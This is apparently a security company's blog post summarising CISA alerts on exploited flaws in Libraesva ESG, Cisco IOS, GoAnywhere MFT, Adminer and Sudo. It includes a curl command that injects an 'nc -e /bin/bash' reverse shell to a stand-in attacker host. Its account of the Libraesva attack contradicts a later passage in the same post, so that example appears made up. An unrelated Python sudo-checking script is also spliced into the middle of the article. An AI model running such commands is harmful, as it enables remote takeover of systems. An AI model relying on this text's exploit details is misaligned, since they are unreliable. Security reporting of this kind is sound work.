CISA Alerts on Actively Exploited Vulnerabilities in Key Software

Edward Zhou

CEO & Co-Founder
October 2, 2025
4 min read

CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks

In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices. This flaw has quickly become a favored target for threat actors due to its ease of exploitation and the widespread deployment of Libraesva ESG as a frontline defense in email infrastructure.

The vulnerability permits unauthenticated attackers to execute arbitrary system commands on affected devices, posing significant risks of email compromise and data exfiltration. Initial discovery of this security weakness surfaced after multiple security firms detected unusual traffic directed at public-facing ESG appliances across Europe and North America.

Attackers swiftly weaponized proof-of-concept exploits, taking advantage of the flaw's straightforward payload delivery, typically a crafted HTTP POST request to an exposed management interface. Organizations using Libraesva ESG for spam and phishing defense are at risk, as exploitation often leads to full device takeover. CISA analysts have noted that attackers exploiting CVE-2025-59689 operate with speed and stealth, leaving minimal traces in security logs. Successful exploitation lets an attacker obtain remote shell access, install additional malware packages, and use the ESG appliance as a pivot point for internal reconnaissance.

CISA documented several incidents where attackers deployed reverse shells to create persistent access channels post-compromise. The infection mechanism is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API, embedding command payloads in user-supplied parameters. For example:

curl -X POST "https://target-esg/management/api[.]php" -d '[cmd]=;nc -e /bin/bash attacker[.]com 4444'

This command shows how the flaw allows an external actor to spawn a remote shell directly to the attacker's system, bypassing authentication controls. CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, highlighting the need for timely patching. The ongoing exploitation of CVE-2025-59689 underscores the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.

U.S. CISA adds Adminer, Cisco IOS, Fortra GoAnywhere MFT, Libraesva ESG, and Sudo flaws to its Known Exploited Vulnerabilities catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added several vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2021-21311: Adminer Server-Side Request Forgery Vulnerability.
  • CVE-2025-20352: Cisco IOS and IOS XE Stack-based Buffer Overflow Vulnerability.
  • CVE-2025-10035: Fortra GoAnywhere MFT Deserialization of Untrusted Data Vulnerability.
  • CVE-2025-59689: Libraesva Email Security Gateway Command Injection Vulnerability.
  • CVE-2025-32463: Sudo Inclusion of Functionality from Untrusted Control Sphere Vulnerability.

Last week, Cisco fixed the actively exploited zero-day CVE-2025-20352, which impacts Cisco IOS and IOS XE Software. This high-severity vulnerability resides in the SNMP subsystem, allowing remote authenticated attackers to trigger a DoS condition or achieve root code execution.

The root cause is a stack overflow in the SNMP subsystem, impacting all devices with SNMP enabled. Cisco's Product Security Incident Response Team (PSIRT) is aware of attacks exploiting this vulnerability.

Another critical flaw added to the KEV catalog is CVE-2025-10035. A cybersecurity firm revealed credible evidence that this flaw was exploited in the wild as early as September 10, 2025, preceding its public disclosure. This vulnerability allows an attacker to execute arbitrary commands on affected systems.

Fortra recommends upgrading to a patched version (7.8.4 or Sustain Release 7.6.3) to mitigate this vulnerability and advises restricting public access to the GoAnywhere Admin Console, as exploitation depends on internet exposure.

CISA added vulnerability CVE-2025-59689 after Libraesva reported nation-state actors exploiting the command injection flaw in its Email Security Gateway. An attacker can trigger the vulnerability by sending malicious emails containing specially crafted compressed attachments, allowing arbitrary commands to be executed.

Additionally, vulnerabilities disclosed in early July in the Sudo command-line utility for Unix-like systems allow local attackers to escalate privileges to root. The vulnerabilities include:

  • CVE-2025-32462: Sudo before 1.9.17p1, when configured with certain sudoers files, allows listed users to execute commands on unintended machines.
  • CVE-2025-32463: Allows local users to obtain root access due to improper handling of /etc/nsswitch.conf from a user-controlled directory when using the -R (--chroot) option.

Experts recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure. Federal agencies are mandated to resolve these vulnerabilities by October 20, 2025.

CISA Sounds Alarm on Critical Sudo Flaw Actively Exploited in Linux and Unix Systems

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw impacting the Sudo command-line utility for Linux and Unix-like operating systems to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.

The vulnerability, identified as CVE-2025-32463 with a CVSS score of 9.3, affects Sudo versions prior to 1.9.17p1. It was disclosed by Stratascale researcher Rich Mirch in July 2025. CISA noted that this vulnerability could allow local attackers to leverage Sudo's -R (--chroot) option to run arbitrary commands as root, even if they are not listed in the sudoers file.
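As an added defender-side example (not code from the article, CISA or the Sudo project), the helper below covers the two checks a practitioner wants for CVE-2025-32463 as described here and in the earlier Sudo list: whether an installed sudo predates the fixed release 1.9.17p1 (the "pN" patch-level suffix makes naive string comparison wrong), and whether auth logs show sudo being invoked with the -R/--chroot option. It assumes sudo records a CHROOT= field in its syslog line for such invocations; the sample log lines are constructed for the demo.

```python
import re
import subprocess

FIXED_VERSION = "1.9.17p1"  # first release without CVE-2025-32463, per the article

def parse_version(v):
    """'1.9.17p1' -> (1, 9, 17, 1); '1.9.16' -> (1, 9, 16, 0)."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {v!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def is_vulnerable_version(v):
    """True when the version string is older than 1.9.17p1."""
    return parse_version(v) < parse_version(FIXED_VERSION)

def installed_sudo_version():
    """Read the local version from `sudo --version` (first line: 'Sudo version X')."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    except OSError:
        return None
    m = re.search(r"Sudo version (\S+)", out)
    return m.group(1) if m else None

# Assumed syslog shape: "sudo: user : TTY=... ; [CHROOT=... ;] PWD=... ; USER=... ; COMMAND=..."
SUDO_LINE = re.compile(r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : (?P<fields>.*)$")

def find_chroot_invocations(lines):
    """Return (user, chroot, command) for each sudo log line that carries a CHROOT= field."""
    hits = []
    for line in lines:
        m = SUDO_LINE.search(line)
        if not m:
            continue
        fields = dict(f.split("=", 1) for f in m["fields"].split(" ; ") if "=" in f)
        if "CHROOT" in fields:
            hits.append((m["user"], fields["CHROOT"], fields.get("COMMAND", "")))
    return hits

# Constructed sample log lines (not real incident data).
SAMPLE_LOG = [
    "Oct  1 09:12:01 mx1 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update",
    "Oct  1 09:13:44 mx1 sudo:      bob : TTY=pts/1 ; CHROOT=/tmp/stage ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/woot",
    "Oct  1 09:14:02 mx1 sudo:      bob : command not allowed ; TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/id",
]

if __name__ == "__main__":
    ver = installed_sudo_version()
    print("installed sudo:", ver, "vulnerable:", bool(ver) and is_vulnerable_version(ver))
    for hit in find_chroot_invocations(SAMPLE_LOG):
        print("sudo -R invocation:", hit)
```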

CISA has also added other flaws to the KEV catalog:

  • CVE-2021-21311: Adminer server-side request forgery vulnerability.
  • CVE-2025-20352: Cisco IOS and IOS XE stack-based buffer overflow vulnerability.
  • CVE-2025-10035: Fortra GoAnywhere MFT deserialization of untrusted data vulnerability.
  • CVE-2025-59689: Libraesva Email Security Gateway command injection vulnerability.

Federal Civilian Executive Branch (FCEB) agencies relying on the affected products are advised to apply necessary mitigations by October 20, 2025, to secure their networks.

Edward Zhou

CEO & Co-Founder of Gopher Security, leading the development of Post-Quantum cybersecurity technologies and solutions.
